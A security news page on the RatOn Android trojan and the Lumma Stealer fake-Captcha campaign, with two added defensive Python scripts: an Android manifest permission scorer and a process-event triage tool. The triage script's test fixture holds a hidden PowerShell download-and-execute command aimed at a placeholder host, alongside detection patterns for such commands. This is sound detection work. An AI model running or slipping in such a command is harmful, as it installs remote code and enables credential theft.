A new Android malware strain called RatOn has rapidly evolved from a tool limited to NFC relay attacks into a sophisticated remote access trojan with the ability to steal banking credentials, hijack cryptocurrency wallets, and even lock users out of their phones with ransom-style screens. Researchers warn the malware is under active development and combines multiple attack methods rarely seen together in one mobile threat.

How It Spreads

RatOn is being distributed through fake websites designed to look like the Google Play Store. Some of these pages advertise an adult-themed version of TikTok called “TikTok 18+.” Once victims install the dropper app, it requests permission to install software from unknown sources, bypassing Android’s built-in safeguards. The second-stage payload then seeks administrator and accessibility permissions, along with access to contacts and system settings, giving it deep control of the device. From there, RatOn can download an additional component called NFSkate, a modified version of the NFCGate tool, enabling advanced relay attacks known as “ghost taps.”


Capabilities and Tactics

The trojan’s abilities are wide-ranging:

1. Overlays and ransomware screens: RatOn can display fake login pages to steal credentials or lock the device with alarming ransom notes. Some overlays falsely accuse users of viewing child exploitation content and demand $200 in cryptocurrency within two hours to regain access.

2. Banking and crypto theft: It specifically targets cryptocurrency wallets such as MetaMask, Trust Wallet, Blockchain.com, and Phantom. By capturing PIN codes and recovery phrases, the malware enables attackers to take over accounts and steal assets. It can also perform automated transfers inside George Česko, a Czech banking app, by simulating taps and inputs.

3. NFC relay attacks: Through NFSkate, RatOn can remotely use victims’ card data for contactless payments.

4. Remote commands: The malware can change device settings, send fake push notifications, send SMS messages, add contacts, record screens, launch apps like WhatsApp and Facebook, lock the phone, and update its target list of financial apps.

Researchers noted RatOn shares no code with other Android banking trojans and appears to have been built from scratch. A similar trend has been seen before: the HOOK trojan, another Android threat, also experimented with ransomware-style overlays.


Development and Targets

The first sample of RatOn was detected on July 5, 2025, with further versions appearing as recently as August 29, pointing to ongoing development. Current attacks focus mainly on users in the Czech Republic and Slovakia. Investigators believe the need for local bank account numbers in automated transfers suggests possible collaboration with regional money mules.


Why It Matters

RatOn’s integration of overlay fraud, ransomware intimidation, NFC relay, and automated transfers makes it unusually powerful. By combining old tactics with new automation, it raises the risk of large-scale theft from both traditional banking users and cryptocurrency holders.

Users can reduce exposure by downloading apps only from official stores, refusing risky permissions for unknown apps, keeping devices updated, and using strong multi-factor authentication on financial accounts. For cryptocurrency, hardware wallets that keep recovery phrases offline provide stronger protection. Anyone who suspects infection should immediately alert their bank and seek professional removal help.
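To make the permission chain described above concrete from a defender's side, the following is an added example (not code from the researchers who analysed RatOn, nor from any vendor) that scores a decoded AndroidManifest.xml for the combination of rights the article lists: installing from unknown sources, device admin, accessibility, overlays, contacts, SMS, settings and NFC. The permission strings are standard Android ones; the two manifests, the package names, the weights and the alert threshold are constructed assumptions for illustration.

```python
"""Triage a decoded Android manifest for the permission chain RatOn's dropper
and second stage request. Added example for this page, not the researchers'
tooling. The manifest texts, package names, weights and threshold are
constructed assumptions; the permission names are standard Android ones."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS
A_PERMISSION = "{%s}permission" % ANDROID_NS
ACCESSIBILITY_ACTION = "android.accessibilityservice.AccessibilityService"

# Weights are this example's assumption, not a published scoring scheme.
RISK_WEIGHTS = {
    "android.permission.REQUEST_INSTALL_PACKAGES": 3,    # dropper installs a 2nd stage
    "android.permission.BIND_DEVICE_ADMIN": 3,           # device-admin receiver (lock screen)
    "android.permission.BIND_ACCESSIBILITY_SERVICE": 4,  # automated taps, input capture
    "android.permission.SYSTEM_ALERT_WINDOW": 3,         # overlays / ransom screens
    "android.permission.SEND_SMS": 2,
    "android.permission.READ_CONTACTS": 1,
    "android.permission.WRITE_CONTACTS": 1,
    "android.permission.WRITE_SETTINGS": 2,
    "android.permission.NFC": 2,                         # NFC relay component
}
ALERT_THRESHOLD = 10  # assumption: this many points warrants a manual look


def collect_permissions(manifest_xml):
    """Return every permission string a manifest declares: each
    <uses-permission>, the android:permission guarding a <service> or
    <receiver> (accessibility and device-admin components are declared
    that way), and a BIND_ACCESSIBILITY_SERVICE hit for any component
    whose intent filter names the accessibility-service action."""
    root = ET.fromstring(manifest_xml)
    found = set()
    for node in root.iter("uses-permission"):
        if node.get(A_NAME):
            found.add(node.get(A_NAME))
    for tag in ("service", "receiver"):
        for node in root.iter(tag):
            if node.get(A_PERMISSION):
                found.add(node.get(A_PERMISSION))
    for action in root.iter("action"):
        if action.get(A_NAME) == ACCESSIBILITY_ACTION:
            found.add("android.permission.BIND_ACCESSIBILITY_SERVICE")
    return found


def score_manifest(manifest_xml):
    """Return (score, {permission: weight}, alert) for one manifest."""
    hits = {p: RISK_WEIGHTS[p] for p in collect_permissions(manifest_xml)
            if p in RISK_WEIGHTS}
    score = sum(hits.values())
    return score, hits, score >= ALERT_THRESHOLD


# Constructed manifest mimicking the chain described above (not a real sample).
DROPPER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeplay.dropper">
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.NFC"/>
  <application>
    <service android:name=".Helper"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <receiver android:name=".Admin"
              android:permission="android.permission.BIND_DEVICE_ADMIN"/>
  </application>
</manifest>"""

# Constructed manifest of an ordinary app, for comparison.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <application/>
</manifest>"""

if __name__ == "__main__":
    for label, manifest in (("dropper", DROPPER_MANIFEST), ("benign", BENIGN_MANIFEST)):
        score, hits, alert = score_manifest(manifest)
        print(label, score, "ALERT" if alert else "ok", sorted(hits))
```

Feed it the decoded manifest of a sideloaded APK (the form apktool produces, not the binary manifest inside the archive). An accessibility service on its own is common in legitimate apps; what matches the chain described is the combination with installer, device-admin and overlay rights, which is why the summed score rather than any single permission raises the alert.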


Hackers Trick Users with Fake Captchas to Steal Data

Cybersecurity researchers have uncovered a new technique where attackers use fake Captcha tests to trick people into installing malware called Lumma Stealer. This malicious program is designed to quietly search infected computers for valuable information, such as login credentials, cryptocurrency wallet details, and two-factor authentication codes.

The scheme first appeared on a Greek banking website, where users were shown what looked like a Captcha security test. Instead of a normal verification, the prompt instructed Windows users to copy a piece of text into their Run dialog box and press Enter. By doing so, victims unknowingly triggered the installation of Lumma Stealer without downloading a visible file.

According to data shared by DNSFilter, a security company monitoring the incident, clients came across this fake Captcha 23 times in just three days. Alarmingly, around 17% of users who saw it followed the instructions, which led to attempts to infect their systems with malware.
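The delivery step above leaves a recognisable shape in endpoint telemetry: the Run box is hosted by explorer.exe, so the pasted text shows up as a scripting interpreter spawned by explorer.exe with a command line no person would type by hand. The following is an added example, not DNSFilter's or any vendor's product logic, that triages process-creation records (the Sysmon Event ID 1 fields ParentImage, Image and CommandLine) for that pattern. The three events and the URL, which uses the reserved example.invalid domain, are constructed.

```python
"""Flag process-creation events matching the 'paste this into the Run box'
lure described above. Added example for this page, not DNSFilter's logic.
The event records are constructed; the URL uses a reserved placeholder."""
import re
from dataclasses import dataclass

# Interpreters a Run-dialog paste typically resolves to. The Run box itself
# is hosted by explorer.exe, so that is the parent process we look for.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe", "certutil.exe", "curl.exe",
}

# Command-line traits a person almost never types by hand at the Run box.
TRAITS = [
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "base64-encoded command"),
    (re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.I),
     "download-and-execute cmdlet"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "profile bypass"),
]


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    parent_image: str
    image: str
    command_line: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return the matched traits; an empty list means 'not this pattern'."""
    if _basename(event.parent_image) != "explorer.exe":
        return []
    if _basename(event.image) not in INTERPRETERS:
        return []
    return [label for pattern, label in TRAITS if pattern.search(event.command_line)]


def scan(events):
    """Return {command_line: traits} for every event with at least one trait."""
    return {e.command_line: triage(e) for e in events if triage(e)}


# Constructed events (not captured telemetry).
LURE_EVENT = ProcessEvent(
    parent_image=r"C:\Windows\explorer.exe",
    image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    command_line='powershell -w hidden -nop -c "iex (iwr http://verify.example.invalid/check)"',
)
PLAIN_RUN_EVENT = ProcessEvent(  # a user opening a shell from the Run box: same parent, no traits
    parent_image=r"C:\Windows\explorer.exe",
    image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    command_line="powershell",
)
NOTEPAD_EVENT = ProcessEvent(
    parent_image=r"C:\Windows\explorer.exe",
    image=r"C:\Windows\System32\notepad.exe",
    command_line="notepad.exe C:\\Users\\alice\\notes.txt",
)

if __name__ == "__main__":
    for cmd, traits in scan([LURE_EVENT, PLAIN_RUN_EVENT, NOTEPAD_EVENT]).items():
        print("SUSPECT:", cmd, "->", ", ".join(traits))
```

Requiring at least one trait, rather than alerting on every interpreter spawned by explorer.exe, keeps ordinary users who open a shell from the Run box out of the results. On a host that trips the rule, the Run box's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a useful artifact for confirming what was pasted.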


How Lumma Stealer Works

Once inside a computer, Lumma Stealer immediately begins searching for anything that can be exploited for profit. This includes saved browser passwords, cookies, stored two-factor authentication tokens, cryptocurrency wallets, and even the data kept in password managers. Cybercriminals can use this stolen information to commit identity theft, break into financial accounts, or steal digital assets such as crypto funds.

What makes this threat particularly concerning is that Lumma Stealer can be hidden on otherwise legitimate websites, meaning unsuspecting users may fall victim even without visiting suspicious or obviously harmful pages.


Malware-as-a-Service Model

Lumma Stealer is part of a growing cybercrime trend known as Malware-as-a-Service (MaaS). Under this model, professional malware developers create the malicious software, improve its ability to avoid detection, and maintain hosting services. They then rent access to the malware to other cybercriminals in exchange for subscription fees. This arrangement makes it easy for attackers with little technical expertise to launch damaging campaigns.

Earlier this year, authorities attempted to disrupt Lumma Stealer operations. The U.S. Department of Justice seized several domains linked to the malware, while Microsoft removed thousands of related websites. However, security analysts report that Lumma Stealer quickly resurfaced, showing just how resilient and profitable such services can be.

Part of Lumma Stealer’s popularity comes from its low cost. Subscriptions can be found on underground forums for only a few hundred dollars per month, yet the potential financial return for criminals is enormous. In recent analyses, experts estimated that hundreds of thousands of devices have been compromised, with losses reaching tens of millions of dollars.

The importance of staying alert online cannot be emphasised enough. Unusual instructions, such as copying text into a computer’s Run command, should raise suspicion immediately. Cybersecurity specialists advise users to verify unexpected prompts and ensure their systems are protected with updated security tools to reduce the risk of infection.